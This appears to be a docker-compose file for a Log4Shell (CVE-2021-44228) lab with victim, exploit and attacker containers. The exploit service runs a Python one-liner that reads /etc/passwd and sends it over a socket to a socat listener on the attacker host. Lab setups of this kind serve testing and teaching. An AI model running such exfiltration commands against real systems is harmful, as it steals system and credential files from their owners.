version: "3.9"

services:
  victim:
    image: cve-2021-44228--spring-hibernate_victim
    build:
      context: victim/
    ports:
      - "8080:8080"
  exploit:
    image: cve-2021-44228--spring-hibernate_exploit
    build:
      context: exploit/ 
    command: ["python3 -c 'import socket;s=socket.socket();s.connect((\"attacker\",9000));s.sendall(open(\"/etc/passwd\",\"rb\").read());s.close()'"]
  attacker:
    image: alpine/socat
    command: ["-lu", "STDIO", "tcp-listen:9000,reuseaddr"]
